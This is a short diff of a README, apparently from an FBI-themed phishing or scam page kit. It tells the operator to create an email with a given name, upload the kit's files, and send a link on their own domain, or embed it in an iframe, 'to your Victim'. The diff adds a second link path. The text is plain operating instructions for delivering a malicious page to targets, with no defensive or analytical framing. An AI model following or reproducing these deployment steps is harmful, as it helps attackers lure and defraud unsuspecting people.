TheHenker/fbi/README.md

 the only thing that you need is creating an email with this name: pxXjEd83

-Upload the files then give a link http://yourdomain.com/5/7/index.html to your Victim.
+Upload the files then give a link http://yourdomain.com/5/7/index.html or http://yourdomain.com/index.html to your Victim.

 Or use an Iframe with your URL.